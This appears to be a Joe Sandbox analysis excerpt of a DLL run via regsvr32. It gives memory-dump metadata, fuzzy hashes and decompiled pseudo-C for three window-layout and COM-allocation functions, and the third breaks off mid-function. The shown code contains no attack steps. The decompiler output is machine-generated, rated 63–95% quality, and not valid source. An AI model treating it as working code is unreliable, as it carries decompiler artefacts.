                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                        • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                        • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr* _v24;
                                                                        				signed int _v32;
                                                                        				struct tagRECT _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				struct tagRECT _v72;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t170;
                                                                        				signed int _t171;
                                                                        				intOrPtr* _t172;
                                                                        				signed int _t175;
                                                                        				signed int _t177;
                                                                        				intOrPtr* _t179;
                                                                        				signed char _t183;
                                                                        				signed int _t184;
                                                                        				signed int _t186;
                                                                        				intOrPtr* _t200;
                                                                        				intOrPtr* _t204;
                                                                        				signed int _t220;
                                                                        				intOrPtr* _t223;
                                                                        				signed char _t233;
                                                                        				signed int _t247;
                                                                        				signed int _t249;
                                                                        				signed int _t258;
                                                                        				signed int _t261;
                                                                        				signed int _t266;
                                                                        				signed int _t268;
                                                                        				intOrPtr _t270;
                                                                        				signed int _t273;
                                                                        				intOrPtr _t275;
                                                                        				signed int _t277;
                                                                        				intOrPtr* _t282;
                                                                        
                                                                        				_t268 = 0;
                                                                        				_push(0);
                                                                        				_t223 = __ecx;
                                                                        				_push(0);
                                                                        				_push(0x418);
                                                                        				_v16 = 0;
                                                                        				_v56 = 0;
                                                                        				_v52 = 0;
                                                                        				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
                                                                        				_v32 = _t277;
                                                                        				if(_t277 != 0) {
                                                                        					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
                                                                        					_v16 = _t175;
                                                                        					if(_t277 > 0) {
                                                                        						_v12 = _t175;
                                                                        						do {
                                                                        							E1002B71F(_t223, _t268, _v12);
                                                                        							_v12 = _v12 + 0x14;
                                                                        							_t268 = _t268 + 1;
                                                                        						} while (_t268 < _t277);
                                                                        						_t270 = _v16;
                                                                        						_t177 = 0;
                                                                        						if(_t277 > 0) {
                                                                        							_t233 =  *(_t223 + 0x7c);
                                                                        							if((_t233 & 0x00000002) == 0) {
                                                                        								_t266 = _t233 & 0x00000004;
                                                                        								_v48.bottom = _t266;
                                                                        								if(_t266 == 0) {
                                                                        									L19:
                                                                        									_push(_t177);
                                                                        									asm("sbb eax, eax");
                                                                        									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                        									__eflags = _t177;
                                                                        									goto L20;
                                                                        								} else {
                                                                        									if((_a8 & 0x00000004) != 0) {
                                                                        										L18:
                                                                        										_push(_t177);
                                                                        										_push( *((intOrPtr*)(_t223 + 0x6c)));
                                                                        									} else {
                                                                        										if((_a8 & 0x00000008) == 0) {
                                                                        											__eflags = _a8 & 0x00000010;
                                                                        											if((_a8 & 0x00000010) == 0) {
                                                                        												__eflags = _a12 - 0xffffffff;
                                                                        												if(_a12 == 0xffffffff) {
                                                                        													__eflags = _t233 & 0x00000001;
                                                                        													if((_t233 & 0x00000001) == 0) {
                                                                        														goto L19;
                                                                        													} else {
                                                                        														goto L18;
                                                                        													}
                                                                        												} else {
                                                                        													SetRectEmpty( &_v48);
                                                                        													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
                                                                        													_t220 = _a8 & 0x00000020;
                                                                        													__eflags = _t220;
                                                                        													if(_t220 == 0) {
                                                                        														_t258 = _v48.right - _v48.left;
                                                                        														__eflags = _t258;
                                                                        													} else {
                                                                        														_t258 = _v48.bottom - _v48.top;
                                                                        													}
                                                                        													_push(_t220);
                                                                        													_push(_t258 + _a12);
                                                                        												}
                                                                        											} else {
                                                                        												_push(0);
                                                                        												L20:
                                                                        												_push(_t177);
                                                                        											}
                                                                        										} else {
                                                                        											_push(0);
                                                                        											_push(0x7fff);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								_push(_t277);
                                                                        								_push(_t270);
                                                                        								E1002BCF4(_t223, _t266);
                                                                        							}
                                                                        							_push(_t277);
                                                                        							_push(_t270);
                                                                        							_push( &(_v48.right));
                                                                        							_t179 = E1002BBD2(_t223);
                                                                        							_v56 =  *_t179;
                                                                        							_v52 =  *((intOrPtr*)(_t179 + 4));
                                                                        							if((_a8 & 0x00000040) != 0) {
                                                                        								_t261 = 0;
                                                                        								_v8 = 0;
                                                                        								_a12 = 0;
                                                                        								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
                                                                        								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
                                                                        								if(_t277 > 0) {
                                                                        									_t200 = _t270 + 4;
                                                                        									_v24 = _t200;
                                                                        									_t247 = _t277;
                                                                        									do {
                                                                        										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
                                                                        											_t261 = _t261 + 1;
                                                                        										}
                                                                        										_t200 = _t200 + 0x14;
                                                                        										_t247 = _t247 - 1;
                                                                        									} while (_t247 != 0);
                                                                        									_a12 = _t261;
                                                                        									if(_t261 > 0) {
                                                                        										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
                                                                        										if(_t273 == 0) {
                                                                        											_t64 =  &_v8;
                                                                        											 *_t64 = _v8 & 0x00000000;
                                                                        											__eflags =  *_t64;
                                                                        										} else {
                                                                        											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
                                                                        											_v8 = _t273;
                                                                        										}
                                                                        										_a12 = _a12 & 0x00000000;
                                                                        										_v12 = _v12 & 0x00000000;
                                                                        										_t204 = _v24;
                                                                        										_t275 = _v8 + 8;
                                                                        										_v20 = _t275;
                                                                        										_v24 = _t204;
                                                                        										do {
                                                                        											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
                                                                        												_t249 = _v12;
                                                                        												 *((intOrPtr*)(_t275 - 8)) = _t249;
                                                                        												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
                                                                        												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
                                                                        												E10028E96(_t223,  &_v72);
                                                                        												_a12 = _a12 + 1;
                                                                        												_v20 = _v20 + 0x18;
                                                                        												_t204 = _v24;
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												_t277 = _v32;
                                                                        												_t275 = _v20;
                                                                        											}
                                                                        											_v12 = _v12 + 1;
                                                                        											_t204 = _t204 + 0x14;
                                                                        											_v24 = _t204;
                                                                        										} while (_v12 < _t277);
                                                                        									}
                                                                        								}
                                                                        								_t183 =  *(_t223 + 0x7c);
                                                                        								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
                                                                        									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
                                                                        								}
                                                                        								_t271 = 0;
                                                                        								_t307 = _t277;
                                                                        								if(_t277 > 0) {
                                                                        									_v20 = _v16;
                                                                        									do {
                                                                        										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
                                                                        										_v20 = _v20 + 0x14;
                                                                        										_t271 = _t271 + 1;
                                                                        									} while (_t271 < _t277);
                                                                        								}
                                                                        								_t184 = _a12;
                                                                        								if(_t184 > 0) {
                                                                        									_t282 = _v8 + 8;
                                                                        									_a12 = _t184;
                                                                        									do {
                                                                        										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
                                                                        										_v32 = _t186;
                                                                        										if(_t186 != 0) {
                                                                        											GetWindowRect( *(_t186 + 0x1c),  &_v72);
                                                                        											_t271 = _v72.left -  *_t282;
                                                                        											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
                                                                        											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
                                                                        											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
                                                                        										}
                                                                        										_t282 = _t282 + 0x18;
                                                                        										_t125 =  &_a12;
                                                                        										 *_t125 = _a12 - 1;
                                                                        										_t313 =  *_t125;
                                                                        									} while ( *_t125 != 0);
                                                                        									_push(_v8);
                                                                        									L1001F7A9(_t223, _t271, _t282, _t313);
                                                                        								}
                                                                        								_t270 = _v16;
                                                                        								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
                                                                        							}
                                                                        							_push(_t270);
                                                                        							L1001F7A9(_t223, _t270, _t277, _t313);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				SetRectEmpty( &_v72);
                                                                        				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
                                                                        				_v52 = _v52 + _v72.top - _v72.bottom;
                                                                        				_v56 = _v56 + _v72.left - _v72.right;
                                                                        				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                        				_t170 = _v48.right;
                                                                        				if(_v56 <= _t170) {
                                                                        					_v56 = _t170;
                                                                        				}
                                                                        				_t171 = _v48.bottom;
                                                                        				if(_v52 <= _t171) {
                                                                        					_v52 = _t171;
                                                                        				}
                                                                        				_t172 = _a4;
                                                                        				 *_t172 = _v56;
                                                                        				 *(_t172 + 4) = _v52;
                                                                        				return _t172;
                                                                        			}
                                                                        0x1002c237
                                                                        0x1002c231
                                                                        0x1002c2a9
                                                                        0x1002c2ac
                                                                        0x1002c2ad
                                                                        0x1002c2ad
                                                                        0x1002c2b2
                                                                        0x1002c2b3
                                                                        0x1002c2b7
                                                                        0x1002c2ba
                                                                        0x1002c2c8
                                                                        0x1002c2cb
                                                                        0x1002c2ce
                                                                        0x1002c2da
                                                                        0x1002c2de
                                                                        0x1002c2e1
                                                                        0x1002c2e4
                                                                        0x1002c2e7
                                                                        0x1002c2ed
                                                                        0x1002c2f3
                                                                        0x1002c2f6
                                                                        0x1002c2f9
                                                                        0x1002c2fb
                                                                        0x1002c2ff
                                                                        0x1002c306
                                                                        0x1002c306
                                                                        0x1002c307
                                                                        0x1002c30a
                                                                        0x1002c30a
                                                                        0x1002c30f
                                                                        0x1002c312
                                                                        0x1002c324
                                                                        0x1002c329
                                                                        0x1002c340
                                                                        0x1002c340
                                                                        0x1002c340
                                                                        0x1002c32b
                                                                        0x1002c336
                                                                        0x1002c33b
                                                                        0x1002c33b
                                                                        0x1002c347
                                                                        0x1002c34b
                                                                        0x1002c34f
                                                                        0x1002c352
                                                                        0x1002c355
                                                                        0x1002c358
                                                                        0x1002c35b
                                                                        0x1002c35f
                                                                        0x1002c366
                                                                        0x1002c369
                                                                        0x1002c372
                                                                        0x1002c37a
                                                                        0x1002c386
                                                                        0x1002c38b
                                                                        0x1002c38e
                                                                        0x1002c392
                                                                        0x1002c398
                                                                        0x1002c399
                                                                        0x1002c39a
                                                                        0x1002c39b
                                                                        0x1002c39c
                                                                        0x1002c39f
                                                                        0x1002c39f
                                                                        0x1002c3a2
                                                                        0x1002c3a5
                                                                        0x1002c3ab
                                                                        0x1002c3ab
                                                                        0x1002c35b
                                                                        0x1002c312
                                                                        0x1002c3b0
                                                                        0x1002c3b5
                                                                        0x1002c3be
                                                                        0x1002c3be
                                                                        0x1002c3c1
                                                                        0x1002c3c3
                                                                        0x1002c3c5
                                                                        0x1002c3ca
                                                                        0x1002c3cd
                                                                        0x1002c3d3
                                                                        0x1002c3d8
                                                                        0x1002c3dc
                                                                        0x1002c3dd
                                                                        0x1002c3cd
                                                                        0x1002c3e1
                                                                        0x1002c3e6
                                                                        0x1002c3eb
                                                                        0x1002c3ee
                                                                        0x1002c3f1
                                                                        0x1002c3f6
                                                                        0x1002c3fd
                                                                        0x1002c400
                                                                        0x1002c409
                                                                        0x1002c417
                                                                        0x1002c425
                                                                        0x1002c42c
                                                                        0x1002c44b
                                                                        0x1002c44b
                                                                        0x1002c450
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c453
                                                                        0x1002c458
                                                                        0x1002c45b
                                                                        0x1002c460
                                                                        0x1002c464
                                                                        0x1002c467
                                                                        0x1002c467
                                                                        0x1002c46d
                                                                        0x1002c46e
                                                                        0x1002c473
                                                                        0x1002c211
                                                                        0x1002c1ed
                                                                        0x1002c478
                                                                        0x1002c48d
                                                                        0x1002c49a
                                                                        0x1002c4a5
                                                                        0x1002c4b3
                                                                        0x1002c4b8
                                                                        0x1002c4c1
                                                                        0x1002c4c3
                                                                        0x1002c4c3
                                                                        0x1002c4c6
                                                                        0x1002c4cc
                                                                        0x1002c4ce
                                                                        0x1002c4ce
                                                                        0x1002c4d1
                                                                        0x1002c4d7
                                                                        0x1002c4dc
                                                                        0x1002c4e0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Empty$Window
                                                                        • String ID: @
                                                                        • API String ID: 444217639-2766056989
                                                                        • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                        • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t130;
                                                                        				intOrPtr* _t133;
                                                                        				intOrPtr* _t140;
                                                                        				intOrPtr* _t143;
                                                                        				intOrPtr _t144;
                                                                        				signed int _t146;
                                                                        				intOrPtr* _t147;
                                                                        				void* _t149;
                                                                        				intOrPtr* _t153;
                                                                        				signed int _t158;
                                                                        				intOrPtr _t159;
                                                                        				intOrPtr* _t161;
                                                                        				intOrPtr* _t163;
                                                                        				intOrPtr* _t165;
                                                                        				intOrPtr* _t166;
                                                                        				intOrPtr _t169;
                                                                        				intOrPtr* _t170;
                                                                        				intOrPtr* _t172;
                                                                        				intOrPtr _t174;
                                                                        				signed int _t178;
                                                                        				signed int _t180;
                                                                        				signed int _t186;
                                                                        				signed int _t188;
                                                                        				intOrPtr* _t190;
                                                                        				intOrPtr* _t192;
                                                                        				intOrPtr _t196;
                                                                        				intOrPtr _t198;
                                                                        				intOrPtr* _t199;
                                                                        				void* _t200;
                                                                        				intOrPtr _t213;
                                                                        				intOrPtr* _t215;
                                                                        				intOrPtr* _t261;
                                                                        				void* _t263;
                                                                        
                                                                        				E10011BF0(0x1003af36, _t263);
                                                                        				_t130 =  *0x1004c470; // 0x303bb91f
                                                                        				_t261 = __ecx;
                                                                        				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
                                                                        				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
                                                                        				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
                                                                        				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                        					_t133 =  *((intOrPtr*)(__ecx + 8));
                                                                        					if(_t133 != 0) {
                                                                        						_push(_t263 - 0x7c);
                                                                        						_push(_t263 - 0x78);
                                                                        						_push(0x10043008);
                                                                        						_push(_t133);
                                                                        						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
                                                                        							E1000B1A4(_t263 - 0x70, 0x10043744);
                                                                        							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
                                                                        							 *((intOrPtr*)(_t263 - 0x58)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x54)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
                                                                        							 *((intOrPtr*)(_t263 - 0x48)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
                                                                        							E1000B1A4(_t263 - 0x40, 0x1004372c);
                                                                        							_t140 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
                                                                        							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
                                                                        							 *((intOrPtr*)(_t263 - 0x24)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
                                                                        							 *((intOrPtr*)(_t263 - 0x18)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
                                                                        							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
                                                                        							if(_t196 >= 0) {
                                                                        								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
                                                                        								_t143 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
                                                                        								 *(_t263 - 0x98) = 0;
                                                                        								 *((intOrPtr*)(_t263 - 0x94)) = 0;
                                                                        								 *((intOrPtr*)(_t263 - 0x90)) = 0;
                                                                        								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
                                                                        								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
                                                                        								if(_t144 >= 0) {
                                                                        									 *(_t261 + 0x14) =  *(_t263 - 0x98);
                                                                        									_t146 =  *(_t263 - 0x8c);
                                                                        									 *(_t263 - 0x7c) = _t146;
                                                                        									 *(_t261 + 0x10) = _t146;
                                                                        									_t147 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
                                                                        									 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                        									goto L23;
                                                                        								} else {
                                                                        									_t161 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        									 *((intOrPtr*)( *_t161 + 8))(_t161);
                                                                        								}
                                                                        								goto L41;
                                                                        							} else {
                                                                        								_t163 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)( *_t163 + 8))(_t163);
                                                                        								_t134 = _t196;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t134 = 0;
                                                                        					}
                                                                        				} else {
                                                                        					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                        					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
                                                                        					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
                                                                        					if(_t134 >= 0) {
                                                                        						_t166 =  *((intOrPtr*)(_t263 - 0x74));
                                                                        						_push(_t263 - 0x7c);
                                                                        						_push(0x10043208);
                                                                        						_push(_t166);
                                                                        						if( *((intOrPtr*)( *_t166))() >= 0) {
                                                                        							_t186 =  *(_t263 - 0x7c);
                                                                        							_push(_t263 - 0x78);
                                                                        							_push(0x10043348);
                                                                        							 *((intOrPtr*)(_t263 - 0x78)) = 0;
                                                                        							_push(_t186);
                                                                        							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
                                                                        								_t190 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
                                                                        								_t192 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)( *_t192 + 8))(_t192);
                                                                        							}
                                                                        							_t188 =  *(_t263 - 0x7c);
                                                                        							 *((intOrPtr*)( *_t188 + 8))(_t188);
                                                                        						}
                                                                        						if(E1001F77E(0x14) == 0) {
                                                                        							_t169 = 0;
                                                                        						} else {
                                                                        							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
                                                                        						}
                                                                        						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
                                                                        						_t170 =  *((intOrPtr*)(_t263 - 0x74));
                                                                        						 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                                        						_t172 =  *((intOrPtr*)(_t261 + 0x50));
                                                                        						_t229 =  *_t172;
                                                                        						if( *_t172 != 0) {
                                                                        							E1000B427(_t229, _t172 + 4);
                                                                        						}
                                                                        						if(E1001F77E(0x28) == 0) {
                                                                        							_t174 = 0;
                                                                        						} else {
                                                                        							_t174 = E10009E9C(_t173, 0, 0x1f40);
                                                                        						}
                                                                        						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
                                                                        						E1000DB7F(_t174);
                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
                                                                        						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
                                                                        						 *(_t261 + 0x10) = _t178;
                                                                        						_t180 = _t178 + _t178 * 4 << 3;
                                                                        						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
                                                                        						 *(_t261 + 0x14) = _t180;
                                                                        						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
                                                                        						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
                                                                        						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
                                                                        						L23:
                                                                        						 *((intOrPtr*)(_t263 - 0x74)) = 0;
                                                                        						if( *(_t261 + 0x10) > 0) {
                                                                        							_t200 = 0;
                                                                        							do {
                                                                        								_t158 = E1001F77E(0x1c);
                                                                        								 *(_t263 - 0x7c) = _t158;
                                                                        								 *(_t263 - 4) = 0;
                                                                        								if(_t158 == 0) {
                                                                        									_t159 = 0;
                                                                        								} else {
                                                                        									_t159 = E1001E0EA(_t158, 0xa);
                                                                        								}
                                                                        								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
                                                                        								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
                                                                        								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
                                                                        								_t200 = _t200 + 0x28;
                                                                        							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
                                                                        						}
                                                                        						_t198 =  *((intOrPtr*)(_t263 - 0x88));
                                                                        						if(_t198 != 0) {
                                                                        							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
                                                                        								_t149 = 0xffffffdc;
                                                                        								_t199 = _t198 + 0x24;
                                                                        								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
                                                                        								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
                                                                        								while(1) {
                                                                        									_t213 =  *((intOrPtr*)( *_t199 + 4));
                                                                        									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
                                                                        									if(_t213 == 0) {
                                                                        										goto L37;
                                                                        									}
                                                                        									while(1) {
                                                                        										_t153 = E10006D96(_t263 - 0x80);
                                                                        										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
                                                                        										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        									}
                                                                        									L37:
                                                                        									E1001E047( *_t199);
                                                                        									_t215 =  *_t199;
                                                                        									if(_t215 != 0) {
                                                                        										 *((intOrPtr*)( *_t215 + 4))(1);
                                                                        									}
                                                                        									_t199 = _t199 + 0x28;
                                                                        									_t122 = _t263 - 0x74;
                                                                        									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
                                                                        									if( *_t122 != 0) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L40;
                                                                        								}
                                                                        							}
                                                                        							L40:
                                                                        							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
                                                                        						}
                                                                        						L41:
                                                                        						_t134 =  *((intOrPtr*)(_t263 - 0x84));
                                                                        					}
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
                                                                        				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
                                                                        			}


                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000E154
                                                                        • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                        • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Task$AllocFreeH_prolog
                                                                        • String ID:
                                                                        • API String ID: 1522537378-3916222277
                                                                        • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                        • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ebp;
                                                                        				int _t42;
                                                                        				void* _t69;
                                                                        				intOrPtr _t71;
                                                                        				intOrPtr* _t74;
                                                                        				intOrPtr _t76;
                                                                        				void* _t77;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_push(__ecx);
                                                                        				_t71 = _a4;
                                                                        				_v8 = __ecx;
                                                                        				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
                                                                        					L6:
                                                                        					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
                                                                        						_a16 = _a16 | 0x00000004;
                                                                        						if((_a17 & 0x00000050) != 0) {
                                                                        							_a16 = _a16 & 0xffff2fff | 0x00002000;
                                                                        						}
                                                                        					}
                                                                        					_t74 = E100339A3(_v8, _a16);
                                                                        					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                        					if( *(_t74 + 0x34) == 0) {
                                                                        						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
                                                                        					}
                                                                        					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
                                                                        					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                        					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
                                                                        					if((_t42 & 0x10000000) == 0) {
                                                                        						L14:
                                                                        						return _t42;
                                                                        					} else {
                                                                        						E100203AD(_t74, 8);
                                                                        						L13:
                                                                        						_t42 = UpdateWindow( *(_t74 + 0x1c));
                                                                        						goto L14;
                                                                        					}
                                                                        				}
